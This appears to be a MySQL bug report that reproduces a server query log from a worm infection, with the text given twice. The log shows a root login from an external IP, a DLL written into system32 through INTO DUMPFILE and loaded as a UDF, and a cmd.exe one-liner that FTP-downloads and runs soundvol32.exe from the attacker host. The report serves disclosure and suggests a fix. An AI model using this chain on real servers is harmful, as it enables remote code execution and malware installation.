Description:
A virus logged to MySQL server using root account and multiplied it's self across development box.
Here's log of what happened:
070715 15:58:06 5 Connect root@87.248.189.178 on mysql
070715 15:58:17 5 Query DROP TABLE IF EXISTS clown
5 Query CREATE TABLE clown (line BLOB)
070715 15:58:21 5 Query INSERT INTO clown (line) VALUES(0x4D5A9000 --cut--)
5 Query SELECT * FROM clown INTO DUMPFILE 'c:/clown.dll'
070715 15:58:22 5 Query SELECT * FROM clown INTO DUMPFILE 'c:/windows/system32/clown.dll'
070715 15:58:23 5 Query SELECT * FROM clown INTO DUMPFILE 'c:/winnt/system32/clown.dll'
070715 15:58:25 5 Query SELECT * FROM clown INTO DUMPFILE 'e:/windows/system32/clown.dll'
070715 15:58:26 5 Query SELECT * FROM clown INTO DUMPFILE 'e:/winnt/system32/clown.dll'
5 Query SELECT * FROM clown INTO DUMPFILE 'c:/clown.dll'
070715 15:58:28 5 Query SELECT * FROM clown INTO DUMPFILE 'f:/winnt/system32/clown.dll'
070715 15:58:30 5 Query SELECT * FROM clown INTO DUMPFILE 'g:/windows/system32/clown.dll'
5 Query SELECT * FROM clown INTO DUMPFILE 'g:/winnt/system32/clown.dll'
070715 15:58:31 5 Query SELECT * FROM clown INTO DUMPFILE 'h:/windows/system32/clown.dll'
070715 15:58:32 5 Query SELECT * FROM clown INTO DUMPFILE 'h:/winnt/system32/clown.dll'
5 Query CREATE FUNCTION do_system RETURNS integer SONAME 'clown.dll'
070715 15:58:33 5 Query SELECT do_system("cmd.exe /c echo open 87.248.189.178 26751 > o&echo user 1 1 >> o &echo get soundvol32.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &soundvol32.exe")
070715 15:58:34 5 Query DROP TABLE IF EXISTS clown
How to repeat:
Some info on how this virus manifests externally can be found in Bug#29694.This might be a duplicate of Bug#28341 and a reminder that it should be fixed...
Suggested fix:
We should only load UDF from our directory and never allow writing to that directory from inside MySQL.
Description: A virus logged to MySQL server using root account and multiplied it's self across development box. Here's log of what happened: 070715 15:58:06 5 Connect root@87.248.189.178 on mysql 070715 15:58:17 5 Query DROP TABLE IF EXISTS clown 5 Query CREATE TABLE clown (line BLOB) 070715 15:58:21 5 Query INSERT INTO clown (line) VALUES(0x4D5A9000 --cut--) 5 Query SELECT * FROM clown INTO DUMPFILE 'c:/clown.dll' 070715 15:58:22 5 Query SELECT * FROM clown INTO DUMPFILE 'c:/windows/system32/clown.dll' 070715 15:58:23 5 Query SELECT * FROM clown INTO DUMPFILE 'c:/winnt/system32/clown.dll' 070715 15:58:25 5 Query SELECT * FROM clown INTO DUMPFILE 'e:/windows/system32/clown.dll' 070715 15:58:26 5 Query SELECT * FROM clown INTO DUMPFILE 'e:/winnt/system32/clown.dll' 5 Query SELECT * FROM clown INTO DUMPFILE 'c:/clown.dll' 070715 15:58:28 5 Query SELECT * FROM clown INTO DUMPFILE 'f:/winnt/system32/clown.dll' 070715 15:58:30 5 Query SELECT * FROM clown INTO DUMPFILE 'g:/windows/system32/clown.dll' 5 Query SELECT * FROM clown INTO DUMPFILE 'g:/winnt/system32/clown.dll' 070715 15:58:31 5 Query SELECT * FROM clown INTO DUMPFILE 'h:/windows/system32/clown.dll' 070715 15:58:32 5 Query SELECT * FROM clown INTO DUMPFILE 'h:/winnt/system32/clown.dll' 5 Query CREATE FUNCTION do_system RETURNS integer SONAME 'clown.dll' 070715 15:58:33 5 Query SELECT do_system("cmd.exe /c echo open 87.248.189.178 26751 > o&echo user 1 1 >> o &echo get soundvol32.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &soundvol32.exe") 070715 15:58:34 5 Query DROP TABLE IF EXISTS clown How to repeat: Some info on how this virus manifests externally can be found in Bug#29694.This might be a duplicate of Bug#28341 and a reminder that it should be fixed... Suggested fix: We should only load UDF from our directory and never allow writing to that directory from inside MySQL.